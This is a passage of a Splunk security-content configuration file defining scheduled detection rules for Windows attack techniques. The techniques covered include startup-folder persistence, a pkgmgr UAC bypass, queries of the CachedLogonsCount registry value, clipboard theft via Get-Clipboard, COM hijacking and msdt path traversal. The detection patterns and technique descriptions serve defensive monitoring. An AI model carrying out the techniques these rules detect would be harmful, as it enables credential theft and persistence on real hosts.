"*\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\*" by Filesystem.file_create_time Filesystem.process_id Filesystem.file_name Filesystem.user Filesystem.file_path Filesystem.process_guid Filesystem.dest | `drop_dm_object_name(Filesystem)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_boot_or_logon_autostart_execution_in_startup_folder_filter` [ESCU - Windows BootLoader Inventory - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. The following hunting query utilizes a PowerShell Scripted input that captures the bootloader paths for each Windows endpoint it is deployed to. The template inputs.conf is located in the references link. By default, it only captures the path, but may be modified to capture everything that BCDedit provides. It can be verbose, but may be worth it. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1542.001", "T1542"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following hunting query utilizes a PowerShell Scripted input that captures the bootloader paths for each Windows endpoint it is deployed to. The template inputs.conf is located in the references link. By default, it only captures the path, but may be modified to capture everything that BCDedit provides. It can be verbose, but may be worth it. action.escu.how_to_implement = To implement this analytic, a new stanza will need to be added to a inputs.conf and deployed to all or some Windows endpoints. https://gist.github.com/MHaggis/26518cd2844b0e03de6126660bb45707 provides the stanza. If modifying the sourcetype, be sure to update the Macro for this analytic. Recommend running it daily, or weekly, depending on threat model. action.escu.known_false_positives = No false positives here, only bootloaders. Filter as needed or create a lookup as a baseline. action.escu.creation_date = 2023-04-14 action.escu.modification_date = 2023-04-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows BootLoader Inventory - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["BlackLotus Campaign", "Windows BootKits"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Windows BootLoader Inventory - Rule action.correlationsearch.annotations = {"analytic_story": ["BlackLotus Campaign", "Windows BootKits"], "cis20": ["CIS 10"], "confidence": 90, "impact": 90, "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1542.001", "T1542"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `bootloader_inventory` | stats count min(_time) as firstTime max(_time) as lastTime values(_raw) by host | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_bootloader_inventory_filter` [ESCU - Windows Bypass UAC via Pkgmgr Tool - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies a potentially suspicious execution of the 'pkgmgr' process involving the use of an XML input file for package management. The 'pkgmgr' process, though deprecated in modern Windows systems, was historically used for managing packages. The presence of an XML input file raises concerns about the nature of the executed command and its potential impact on the system. Due to the deprecated status of 'pkgmgr' and the involvement of an XML file, this activity warrants careful investigation. XML files are commonly used for configuration and data exchange, making it crucial to ascertain the intentions and legitimacy of the command. To ensure system security, it is recommended to use up-to-date package management utilities, such as DISM or PowerShell's PackageManagement module, and exercise caution when executing commands involving potentially sensitive operations or files. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.002"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies a potentially suspicious execution of the 'pkgmgr' process involving the use of an XML input file for package management. The 'pkgmgr' process, though deprecated in modern Windows systems, was historically used for managing packages. The presence of an XML input file raises concerns about the nature of the executed command and its potential impact on the system. Due to the deprecated status of 'pkgmgr' and the involvement of an XML file, this activity warrants careful investigation. XML files are commonly used for configuration and data exchange, making it crucial to ascertain the intentions and legitimacy of the command. To ensure system security, it is recommended to use up-to-date package management utilities, such as DISM or PowerShell's PackageManagement module, and exercise caution when executing commands involving potentially sensitive operations or files. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives may be present on recent Windows Operating Systems. Filtering may be required based on process_name. In addition, look for non-standard, unsigned, module loads into LSASS. If query is too noisy, modify by adding Endpoint.processes process_name to query to identify the process making the modification. action.escu.creation_date = 2023-07-26 action.escu.modification_date = 2023-07-26 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows Bypass UAC via Pkgmgr Tool - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Warzone RAT"] action.risk = 1 action.risk.param._risk_message = A pkgmgr.exe executed with package manager xml input file on $dest$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 9}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 9}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows Bypass UAC via Pkgmgr Tool - Rule action.correlationsearch.annotations = {"analytic_story": ["Warzone RAT"], "cis20": ["CIS 10"], "confidence": 30, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.002"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name = pkgmgr.exe Processes.process = "*.xml*" NOT(Processes.parent_process_path IN("*:\\windows\\system32\\*", "*:\\windows\\syswow64\\*", "*:\\Program Files*")) by Processes.dest Processes.user Processes.parent_process_name Processes.parent_process_path Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.original_file_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_bypass_uac_via_pkgmgr_tool_filter` [ESCU - Windows CAB File on Disk - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies .cab files being written to disk. Utilize this analytic as a way to hunt for suspect .cab files being written to non-standard paths and tune as needed. Cab files were recently being utilized to deliver .url files embedded. The .url files were then used to deliver malicious payloads. The search specifically looks for instances where the file name is '*.cab' and the action is 'write'. During the triage process, it is recommended to review the file path for additional artifacts that may provide further insights into the event. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566.001"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies .cab files being written to disk. Utilize this analytic as a way to hunt for suspect .cab files being written to non-standard paths and tune as needed. Cab files were recently being utilized to deliver .url files embedded. The .url files were then used to deliver malicious payloads. The search specifically looks for instances where the file name is '*.cab' and the action is 'write'. During the triage process, it is recommended to review the file path for additional artifacts that may provide further insights into the event. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives will only be present if a process legitimately writes a .cab file to disk. Modify the analytic as needed by file path. Filter as needed. action.escu.creation_date = 2023-11-08 action.escu.modification_date = 2023-11-08 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows CAB File on Disk - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["DarkGate Malware"] action.risk = 1 action.risk.param._risk_message = A .cab file was written to disk on endpoint $dest$. action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 5}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows CAB File on Disk - Rule action.correlationsearch.annotations = {"analytic_story": ["DarkGate Malware"], "cis20": ["CIS 10"], "confidence": 10, "impact": 50, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566.001"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count values(Filesystem.file_path) as file_path min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Filesystem where (Filesystem.file_name=*.cab) by Filesystem.dest Filesystem.action Filesystem.process_id Filesystem.file_name | `drop_dm_object_name("Filesystem")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_cab_file_on_disk_filter` [ESCU - Windows Cached Domain Credentials Reg Query - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies a process command line related to the discovery of cache domain credential logon count in the registry. This Technique was being abused by several post exploitation tool like Winpeas where it query CachedLogonsCount registry value in Winlogon registry. This value can be good information about the login caching setting on the Windows OS target host. A value of 0 means login caching is disable and values > 50 caches only 50 login attempts. By default all versions of Windows 10 save cached logins except Windows Server 2008. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.005", "T1003"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies a process command line related to the discovery of cache domain credential logon count in the registry. This Technique was being abused by several post exploitation tool like Winpeas where it query CachedLogonsCount registry value in Winlogon registry. This value can be good information about the login caching setting on the Windows OS target host. A value of 0 means login caching is disable and values > 50 caches only 50 login attempts. By default all versions of Windows 10 save cached logins except Windows Server 2008. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = unknown action.escu.creation_date = 2022-11-30 action.escu.modification_date = 2022-11-30 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows Cached Domain Credentials Reg Query - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Windows Post-Exploitation", "Prestige Ransomware"] action.risk = 1 action.risk.param._risk_message = a process with commandline $process$ tries to retrieve cache domain credential logon count in $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 9}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows Cached Domain Credentials Reg Query - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows Post-Exploitation", "Prestige Ransomware"], "cis20": ["CIS 10"], "confidence": 30, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.005", "T1003"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_reg` AND Processes.process = "* query *" AND Processes.process = "*\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon*" AND Processes.process = "*CACHEDLOGONSCOUNT*" by Processes.process_name Processes.original_file_name Processes.process Processes.process_id Processes.process_guid Processes.parent_process_name Processes.parent_process Processes.parent_process_guid Processes.dest Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_cached_domain_credentials_reg_query_filter` [ESCU - Windows Change Default File Association For No File Ext - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic is developed to detect suspicious process commandline to change or set the default file association of a file without file extension with notepad.exe. This technique was seen in some APT and ransomware Prestige where it set/modify the default process to run file association, like .txt to notepad.exe. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1546.001", "T1546"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic is developed to detect suspicious process commandline to change or set the default file association of a file without file extension with notepad.exe. This technique was seen in some APT and ransomware Prestige where it set/modify the default process to run file association, like .txt to notepad.exe. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = unknown action.escu.creation_date = 2022-11-30 action.escu.modification_date = 2022-11-30 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows Change Default File Association For No File Ext - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Prestige Ransomware"] action.risk = 1 action.risk.param._risk_message = process with commandline $process$ set or change the file association of a file with no file extension in $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows Change Default File Association For No File Ext - Rule action.correlationsearch.annotations = {"analytic_story": ["Prestige Ransomware"], "cis20": ["CIS 10"], "confidence": 100, "impact": 80, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1546.001", "T1546"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic is developed to detect suspicious process commandline to change or set the default file association of a file without file extension with notepad.exe. This technique was seen in some APT and ransomware Prestige where it set/modify the default process to run file association, like .txt to notepad.exe. action.notable.param.rule_title = Windows Change Default File Association For No File Ext action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_reg` AND Processes.process="* add *" AND Processes.process="* HKCR\\*" AND Processes.process="*\\shell\\open\\command*" AND Processes.process= *Notepad.exe* by Processes.process_name Processes.original_file_name Processes.process Processes.process_id Processes.process_guid Processes.parent_process_name Processes.parent_process Processes.parent_process_guid Processes.dest Processes.user | `drop_dm_object_name(Processes)` | rex field=process "Notepad\.exe (?.*$)" | rex field=file_name_association "\.(?[^\.]*$)" | where isnull(extension) and isnotnull(file_name_association) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_change_default_file_association_for_no_file_ext_filter` [ESCU - Windows ClipBoard Data via Get-ClipBoard - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies a powershell script command to retrieve clipboard data. This technique was seen in several post exploitation tools like WINPEAS to steal sensitive information that was saved in clipboard. Using the Get-Clipboard powershell commandlet, adversaries can be able collect data stored in clipboard that might be a copied user name, password or other sensitive information. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1115"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies a powershell script command to retrieve clipboard data. This technique was seen in several post exploitation tools like WINPEAS to steal sensitive information that was saved in clipboard. Using the Get-Clipboard powershell commandlet, adversaries can be able collect data stored in clipboard that might be a copied user name, password or other sensitive information. action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup here https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell. action.escu.known_false_positives = It is possible there will be false positives, filter as needed. action.escu.creation_date = 2022-11-30 action.escu.modification_date = 2022-11-30 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows ClipBoard Data via Get-ClipBoard - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Windows Post-Exploitation", "Prestige Ransomware"] action.risk = 1 action.risk.param._risk_message = Powershell script $ScriptBlockText$ execute Get-Clipboard commandlet on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows ClipBoard Data via Get-ClipBoard - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows Post-Exploitation", "Prestige Ransomware"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1115"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `powershell` EventCode=4104 ScriptBlockText = "*Get-Clipboard*" | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer UserID | rename Computer as dest | rename UserID as user| `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_clipboard_data_via_get_clipboard_filter` [ESCU - Windows COM Hijacking InprocServer32 Modification - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies the use of reg.exe performing an add to the InProcServer32, which may be related to COM hijacking. Adversaries can use the COM system to insert malicious code that can be executed in place of legitimate software through hijacking the COM references and relationships as a means for persistence. Hijacking a COM object requires a change in the Registry to replace a reference to a legitimate system component which may cause that component to not work when executed. When that system component is executed through normal system operation the adversary's code will be executed instead. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1546.015", "T1546"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies the use of reg.exe performing an add to the InProcServer32, which may be related to COM hijacking. Adversaries can use the COM system to insert malicious code that can be executed in place of legitimate software through hijacking the COM references and relationships as a means for persistence. Hijacking a COM object requires a change in the Registry to replace a reference to a legitimate system component which may cause that component to not work when executed. When that system component is executed through normal system operation the adversary's code will be executed instead. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives may be present and some filtering may be required. action.escu.creation_date = 2022-09-26 action.escu.modification_date = 2022-09-26 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows COM Hijacking InprocServer32 Modification - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Living Off The Land"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ attempting to modify InProcServer32 within the registry. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 64}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 64}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 64}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 64}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows COM Hijacking InprocServer32 Modification - Rule action.correlationsearch.annotations = {"analytic_story": ["Living Off The Land"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1546.015", "T1546"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies the use of reg.exe performing an add to the InProcServer32, which may be related to COM hijacking. Adversaries can use the COM system to insert malicious code that can be executed in place of legitimate software through hijacking the COM references and relationships as a means for persistence. Hijacking a COM object requires a change in the Registry to replace a reference to a legitimate system component which may cause that component to not work when executed. When that system component is executed through normal system operation the adversary's code will be executed instead. action.notable.param.rule_title = Windows COM Hijacking InprocServer32 Modification action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_reg` Processes.process=*inprocserver32* by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_com_hijacking_inprocserver32_modification_filter` [ESCU - Windows Command and Scripting Interpreter Hunting Path Traversal - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies path traversal command-line execution and should be used to tune and driver other more higher fidelity analytics. This technique was seen in malicious document that execute malicious code using msdt.exe and path traversal technique that serve as defense evasion. This Hunting query is a good pivot to look for possible suspicious process and command-line that runs execute path traversal technique to run malicious code. This may help you to find possible downloaded malware or other lolbin execution. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies path traversal command-line execution and should be used to tune and driver other more higher fidelity analytics. This technique was seen in malicious document that execute malicious code using msdt.exe and path traversal technique that serve as defense evasion. This Hunting query is a good pivot to look for possible suspicious process and command-line that runs execute path traversal technique to run malicious code. This may help you to find possible downloaded malware or other lolbin execution. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = false positive may vary depends on the score you want to check. The bigger number of path traversal string count the better. action.escu.creation_date = 2022-06-01 action.escu.modification_date = 2022-06-01 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows Command and Scripting Interpreter Hunting Path Traversal - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Windows Defense Evasion Tactics", "Microsoft Support Diagnostic Tool Vulnerability CVE-2022-30190"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows Command and Scripting Interpreter Hunting Path Traversal - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows Defense Evasion Tactics", "Microsoft Support Diagnostic Tool Vulnerability CVE-2022-30190"], "cis20": ["CIS 10"], "confidence": 60, "impact": 60, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Processes by Processes.original_file_name Processes.process_id Processes.parent_process_id Processes.process_hash Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process | `drop_dm_object_name("Processes")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | eval count_of_pattern1 = (mvcount(split(process,"/.."))-1) | eval count_of_pattern2 = (mvcount(split(process,"\.."))-1) | eval count_of_pattern3 = (mvcount(split(process,"\\.."))-1) | eval count_of_pattern4 = (mvcount(split(process,"//.."))-1) | search count_of_pattern1 > 1 OR count_of_pattern2 > 1 OR count_of_pattern3 > 1 OR count_of_pattern4 > 1 | `windows_command_and_scripting_interpreter_hunting_path_traversal_filter` [ESCU - Windows Command and Scripting Interpreter Path Traversal Exec - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies path traversal command-line execution. This technique was seen in malicious document that execute malicious code using msdt.exe and path traversal technique that serve as defense evasion. This TTP is a good pivot to look for more suspicious process and command-line that runs before and after this execution. This may help you to find possible downloaded malware or other lolbin execution. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies path traversal command-line execution. This technique was seen in malicious document that execute malicious code using msdt.exe and path traversal technique that serve as defense evasion. This TTP is a good pivot to look for more suspicious process and command-line that runs before and after this execution. This may help you to find possible downloaded malware or other lolbin execution. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Not known at this moment. action.escu.creation_date = 2022-06-01 action.escu.modification_date = 2022-06-01 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows Command and Scripting Interpreter Path Traversal Exec - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Windows Defense Evasion Tactics", "Microsoft Support Diagnostic Tool Vulnerability CVE-2022-30190"] action.risk = 1 action.risk.param._risk_message = A parent process $parent_process_name$ has spawned a child $process_name$ with path traversal commandline $process$ in $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 90}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows Command and Scripting Interpreter Path Traversal Exec - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows Defense Evasion Tactics", "Microsoft Support Diagnostic Tool Vulnerability CVE-2022-30190"], "cis20": ["CIS 10"], "confidence": 100, "impact": 90, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies path traversal command-line execution. This technique was seen in malicious document that execute malicious code using msdt.exe and path traversal technique that serve as defense evasion. This TTP is a good pivot to look for more suspicious process and command-line that runs before and after this execution. This may help you to find possible downloaded malware or other lolbin execution. action.notable.param.rule_title = Windows Command and Scripting Interpreter Path Traversal Exec action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number 